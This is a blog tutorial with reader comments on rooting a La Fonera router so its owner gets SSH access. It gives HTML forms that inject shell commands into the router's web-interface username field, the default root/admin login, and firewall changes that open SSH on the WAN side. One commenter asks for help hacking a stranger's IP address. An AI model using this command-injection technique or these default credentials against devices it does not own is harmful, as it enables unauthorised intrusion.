Skip to content

Hacking Fonera

Posted by kalkin on
Yesterday I received my Fonera. The last two days i spend on trying to run an ssh daemon on it. After a lot of searching and surfing, i found finally with the help of this two sites a way to force fonera run ssh. I will shortly sum up the hack, it worked successful with 0.7.1 r1 fon firmware (if you have the 0.7.1.2 firmware you have to reset it.):
First you have to write to two html-pages which will inject code in your Fon-Router. Save the following code as step1.html:

<html>
<head>
</head>
<body>
<center>
<form method="post" action="http://192.168.10.1/cgi-bin/webif/connection.sh" enctype="multipart/form-data">
<input name="username" value="$(/usr/sbin/iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT)" size="68" >
<input type="submit" name="submit" value="Submit" onClick="{this.form.wifimode.value='";' + this.form.wifimode.value +';"'}" />
</form>
</body>
</html>

Save the next html code as step2.html.

<html>
<head>
</head>
<body>
<center>
<form method="post" action="http://192.168.10.1/cgi-bin/webif/connection.sh" enctype="multipart/form-data">
<input name="username" value="$(/etc/init.d/dropbear)" size="68" >
<input type="submit" name="submit" value="Submit" onClick="{this.form.wifimode.value='";' + this.form.wifimode.value +';"'}" />
</form>
</body>
</html>

Now connect to your MyPlace Network, open the both sites and just click on the "Submit" button(first at the step1.html then on the step2.html page). Open your favorite shell and connect to your router via ssh with username root and password admin.
ssh root@192.168.10.1

For enabling a permanent ssh access you have to move dropbear to S50 dropbear:

$> mv /etc/init.d/dropbear /etc/init.d/S50dropbear

In the /etc/firewall.user you have to uncomment this lines:

# iptables -t nat -A prerouting_rule -i $WAN -p tcp --dport 22 -j ACCEPT
# iptables -A input_rule -i $WAN -p tcp --dport 22 -j ACCEPT

Now you should prevent Fon from executing received code, by editing /bin/thinclient. You have to comment the last line and add another line, so that the last two lines look like this:

#. /tmp/.thinclient.sh
cp /tmp/.thinclient.sh /tmp/thinclient-$(date '+%Y%m%d-%H%M')

Now you have ssh daemon on your fonera.


btw: thanks a lot cologne.idle and "Пожалуйста не пойте под фанеру!"

Verwandte Links:

Trackbacks

Alessandro "jekil" Tanasi blog on : Hacking La Fonera

Show preview
Today i received my Fonera.Fonera has been designed not to be hacked. Really?Hacking the La FoneraOpenWrtDocs HardwareDd-wrt about La FoneraLa Fonera FlashingHacking FoneraOpenwrt K on la Fonera without serial consoleLa Fonera dissection and hackInside th

Coding my Life on : Fonera Downgrade

Show preview
If you want to downgrade your fonera from 0.7.1.2 firmware to the 0.7.1, look here.

Anonymous on :

Unfortunately, the contents of this trackback can not be displayed.

Comments

Display comments as Linear | Threaded

Aschenbash0r on :

Пожалуйста не пойте под фанеру!
=
Please do not sing under plywood!

I copy&pasted it into an online translator ;-)

kalkin on :

Never trust online translators ;-) .

ARARAT on :

Thnaks for the code. its unsefull for me. Martin

Chance on :

Now if we can just get some decent firmware with a web interface for this device.

kalkin on :

There are some people who are porting dd-wrt to fonera. dd-wrt has also a webinterface. Fore more information look in the dd-wrt forum.

Chance on :

I'm all over it. I just got mine today, and within 5 minutes I was ssh'd in and messing with stuff. I am sure I can get better at the console stuff if I have to use it, but I am lazy and would like a web interface. I have been using DD-WRT for ~2 years and love it so that would be my first choice.
Thanks

matyas on :

Hi,



I have just came accross your website. I have received a fonera too, and i have some (maybe stupid) questions: why is it good that i can have an SSH access to my fonera? what is the advantage of that? and why is it good for me that i prevent FON from executing code on my box?



thank you very much

Matyas (from Hungary)

Riku on :

> why is it good that i can have an SSH access to my fonera?

You can access to that Linux and make some changes. It's also more secure than just telnet.

> what is the advantage of that?

You can make changes.

> and why is it good for me that i prevent FON from executing code on my box?

It's security thing. FON box will execute every code it will receive from FON with out these hacks.

Jay on :

I dont think i understood the thing about uncommenting the lines in the firewall.
Can anybody help me?

Fabs on :

imho you need to write "cp /tmp/.thinclient.sh /tmp/thinclient-$(date '+%Y%m%d-%H%M')", in your code the day will not be written

kalkin on :

Thank you, I edited the line.

geek on :

By the way if you don't want those thinclients filling your Fonera's memory,

instead of this:
#. /tmp/.thinclient.sh
cp /tmp/.thinclient.sh /tmp/thinclient-$(date '+%Y%m%d-%H%M')

use this:
if [ -s /tmp/.thinclient.sh ] ; then
for f in /tmp/thin* ; do
:
done
if [ -f "$f" ]; then
if [ $(md5sum /tmp/.thinclient.sh | cut -d ' ' -f 1) != $(md5sum `ls $f` | cut -d ' ' -f 1) ] ; then
cp /tmp/.thinclient.sh /tmp/thinclient-$(date '+%Y%m%d-%H%M')
fi
else
cp /tmp/.thinclient.sh /tmp/thinclient-$(date '+%Y%m%d-%H%M')
fi
fi


This way a new thinclient "log" will only be created if it differs from the last one and if it's not empty. Code isn't probably very beautiful, but it seems to work :-)

kalkin on :

Great idea, thanks. :-)

fon-fan on :

when will dd-wrt be here?
do you have some more informations, links to threads on the forum?
am i right that linux 2.6 is the only thing to be ported ?

kalkin on :

http://tinyurl.com/u79m4

There is a forum thread about ddwrt on fonera.

Fabs on :

By the way: Wouldn't it be a easier to just remove the cronjob that executes /bin/thinclient every hour? crontab -r?

Late on :

You can remove the crontab, that works too, but it might be interesting to see what the thinclient fetches for you.

futejia on :

Here is another howto http://futejia.blogspot.com/2006/12/my-way-to-hack-lafonera.html
I am waiting for dd-wrt. Yeah!
Btw: the serial console sucks. I tried for more then two hours to use it.

Barol on :

dd-wrt will not herefor a while. But in the meanwhile we have Openwrt ;-) http://www.dd-wrt.com/phpBB2/viewtopic.php?p=49142

Jimmi on :

Lasst es sein !
Diese Sache muss man unterstützen, nicht
hacken !

futejia on :

1) Nur ssh Zugriff drauf verhindert ja nicht, das die FON Software läuft
2) Ich glaube Google und Ebay haben genug geld. Die brauchen unsere Unterstützung nicht.

Stefan Tomanek on :

Take a look at this:
http://stefans.datenbruch.de/lafonera/
and especially http://stefans.datenbruch.de/lafonera/whywedidit.shtml

It's not about sabotaging FON, it's about keeping in control of your network.

jarena on :

After doing this, I have SSH access to La Fonera, but I have lost internet connection via wifi. Under wireless networks I can only see my private network, not the public one. Any ideas? :-S

jarena on :

Al final el problema sólo era que tarda una barbaridad en tomar una ip por dhcp, y mientras no la toma no se ve la red pública. No sé si será algo común o no que tarde tanto, puede que sí, ya que por algún sitio leí que la flash de la fonera era muy lenta prolongando así el tiempo de arranque.

jarena on :

Ooops, sorry for using spanish hehe. In English:

At last the problem was La Fonera was taking too long to get an ip via DHCP, and while this is not done the public network can't be seen. I don't know is this is just normal, but I think so, because I read before the flash memory of La Fonera was quite slow, extending startup time.

Maurizio on :

I have the same issue: SSH access but without Internet connection. How can I overcome such slowness of IP assignment by DHCP?

kalkin on :

Do it take long to get an ip, if you are booting?

I have the same problem, if i'm changing from fixed ip to DHCP. The change take really long.
I've made experience that the best way in this cases is to restart the fonera.

Maurizio on :

Thank you for your reply.

Normally, the DHCP server on my modem/router assigns IP addresses to other network devices in a few seconds. Besides that, I've tried to restart the Fonera, with no effect.

cable on :

When using direct cable link,
You should change the web server address to 169.254.255.1 instead of 192.168.10.1. Both in the html page and the ssh session.

Rui Ponte on :

Users with the release 0.7.1.2 can't do this :-(

kalkin on :

If you got the fonera with the 0.7.1.2 and don't updated it via Webinterface. you can reset it to the 0.7.1.

You take something spiky (for example a pin) and press the reset-button, below the fonera, for 5sec. It should be reseted to the 0.7.1 firmware.

Torbar on :

Remember to unplug the ethernet cable before resetting the router. Otherwise it will keep on auto updating the firmware back to 0.7.1.2 and you will get nowhere ;-)

Rui Ponte on :

What if i've updated via webinterface?

Stefan Tomanek on :

Then you lose. Sorry, no more resets for you, the new firmware has been flashed permanently.

There is a new hack (this time called "kolofonium"), however we are not releasing it until 0.7.1.2 has become widespread on new routers - otherwise, it would be wasted

Paul on :

any estimate on when this might be available? 7.1.2 is rapidly becoming pretty widespread, what with the free 10,000 routers that went out earlier this month (of which i got mine yesterday, woohoo!).

Tiago on :

I installed dd-wrt in my fonera, but yesterday i installed fon original firmware. I download fonera.tar.gz file, that someone told me it is fonera firmware 0.7.1-r1 version but with the first 519 bytes cut. But, when i flashed the fonera and access web interface i saw that the firmware is 0.7.1-r2. I tried do reset fonera mas it didn't change firmware to 0.7.1-r1. Can I do something to hack fonera? I don't have a serial cabel :s

Stefan Tomanek on :

Get a serial cable or wait until our new hack "kolofonium" is released. We are still waiting for widespread distribution of 0.7.1.2

Michael Henn on :

How do I edit this file? /etc/firewall.user

Thanks for any help from anyone!

sp00nix on :

vi /etc/firewall.user
google the VI command list, its kinda confusing how to work

narmacil on :

check this out: this is an error message I get when trying to SSH in... Any idea how to get around this?

@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that the RSA host key has just been changed.
The fingerprint for the RSA key sent by the remote host is
23:55:f0:ec:9e:61:24:e8:8e:a5:0d:79:f0:85:65:64.
Please contact your system administrator.
Add correct host key in /home/Administrator/.ssh/known_hosts to get rid of this
message.
Offending key in /home/Administrator/.ssh/known_hosts:1
RSA host key for 192.168.10.1 has changed and you have requested strict checking
.
Host key verification failed.

narmacil on :

nevermind - it was the ssh client on my side, my bad.

Smiley on :

I'm trying to this on my Mac (10.4.8-) but the basic html just stays like that and won't display. I've tried to open step1/2 in Safari, Firefox, Opera, Realplayer. Seems such a simple thing to do but maybe OSX now blocks HTML somehow?

kalkin on :

I'm using Tiger too, but I have no problems.

Josh on :

OMFG NEED NEW RELEASE FOR 1.7.1.2 HELP THIS ISN"T WOKRKED!!

kalkin on :

Look here: http://mrmuh.blogspot.com/2007/01/codename-kolofonium-realease-date.html

Antonio on :

Hi everybody. I wrote a script that transforms La Fonera as a Repeater and Access Point, you can find it at http://www.blogin.it/fonera4.php
Hope you enjoy ...and improve

Antonio

Wenle on :

i have a problem, when i type in the first line of code:

$> mv /etc/init.d/dropbear /etc/init.d/S50dropbear

it responds -ash: $: not found

what does that mean? should i continue to second command?

kalkin on :

You have to enter the commands without $>. Just enter:
mv /etc/init.d/dropbear /etc/init.d/S50dropbear

Takenover83 on :

Does anyone have a fix for loosing Internet once the SSH mod has been installed?

I have my Fonera hooked up to a WRT54GS.


Also what local webserver work ok with this guide? I tried a couple, but got error's when using wget.

For example.

Using "wget http://127.0.0.1/nameofthefile" just gives me a forbidden type of error.

But when I test the same link in a webbrowser, the webserver works just fine and allows me to download.

Paul on :

i was able to restore internet connectivity by logging into my fon's web interface, and configuring the 'internet connection' for static IP. doesn't matter what you configure it to - use 55.55.55.55 if you like - but fill in all the fields, and click 'submit'. then go right back to the configs, and reset it back to DHCP. that was enough to force to grab onto my main router and talk to the world again.

Paul on :

i also wanted to note that if your fon says it's 7.1.2, be sure and go through coldtobi's instructions. http://blog.coldtobi.de/index.php?op=ViewArticle&articleId=7&blogId=1
i was absolutely convinced that my router was 7.1.2 firmware, but after pulling my fon open (easy!) and looking, yup, 7.1.1. use coldtobi's page to reset the right way, and you'll be able to play soon yourself!

john earthquake on :

i've changed the fonera firmware...but now when i try to run the 2 pages e keeps asking me for a username and a password...any ideia ? thank you :-D

kalkin on :

Reading carefully helps. User: root Pasword: admin. ;-)

Popup2u on :

can help me hack my router 202.129.51.122

dltv on :

does the heartbeat option work in DDWRT or do i need to get an advanced script?

Most importantly can you connect to the router via the Ethernet port with DDWRT? or does it have to be wirelessly? because i cant connect to 192.168.1.1

or whatever the right ip is i still cant connect to the DDWRT interface via ethernet cable only wirelessly

Wrote a tutorial on hacking it at dltv.wordpress.com

grazzt on :

Is it possible to do these things with only the fon connected to a network card via the network cable?

I dont have any wifi cards yet.

I see the 192.168.* is for the wifi side.

The manual states to set static ip for nic to 169.254.255.2. When I do this, I can check the status of the fon by going to http://169.254.255.1 (and showing 0.71 r1 as the firmware).

Any help would be appreciated.

Thanks

grazzt on :

Sorry, for not reading, I see what to do with only a network cable and no wifi.

ANd it worked! :-)

ssd on :

i have followed the instructions here and here [http://www.dd-wrt.com/wiki/index.php/LaFonera_Software_Flashing]. after doing step 3 and rebooting the wireless on the router stopped working. how do i get it to enable again? reset button doesnt work :-(

yea on :

Same here. After step 3 and rebooting the router just sits there and does nothing. I am not able to ssh or telnet into it. It is bricked.

dna on :

where can i get the firmware version 0.7.1 ?

anyone send me e-mail that attached it?

kalkin on :

yoda voice : Google you ask have to!

:-D

jeff on :

get the firmware 7.1 at the DD-WRT wiki on the la fonera its at the bottom of how to flash

Muhammad Waqas on :

plz tell me simple way that how ca i get ip address or how can i use other computer from my computer plz i m very much fond of use the other computer from my plz plz plz plz.

dltv on :

Read http://dltv.wordpress.com/off-the-wall/a-guide-to-hacking-the-la-fonera-wireless-router/

Gives some networking advice.

grazzy on :

For those just using a normal nic and NO wifi, the "hacked" fon will default to DHCP for the wan ip. That is, connect your hacked FON to your computer, and have your computer run a DHCP server (in linux this is easy, under windows, who knows).

Then the FON listens to port 8080 on the wan side.

Hope this helps anyone.

Jürgen on :

Great Post. Very helpfull informations. Thanks a lot. Jürgen from Germany. :-)

Strafverteidiger München on :

This is great:

http://dltv.wordpress.com/off-the-wall/a-guide-to-hacking-the-la-fonera-wireless-router/

But as well a helpfull information.

eric on :

For those that are interested, here’s a site with great tutorials with screenshots for the newer Fonera firmware version 0.7.2-r3 It has guides for Redboot and flashing to DD-WRT and Legend firmware along with some other cool stuff.

http://www.fonerahacks.com

kenjiru on :

I've got to firmware version 0.7.1 r2, but no ssh :-(

Any idea what to do now?

Computmaxer on :

Ya'll should come check out the fonera-hacking community:
www.fonerahacks.com

nglrossi on :

Thanks for the clear howto, just hacked mine.
I am about to install dd-wrt now.

Angelo

Johnny on :

any chance to enable ssh on 0.7.1 r3 ?

Add Comment

Enclosing asterisks marks text as bold (*word*), underscore are made via _word_.
Standard emoticons like :-) and ;-) are converted to images.
E-Mail addresses will not be displayed and will only be used for E-Mail notifications.

To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly.
CAPTCHA

Form options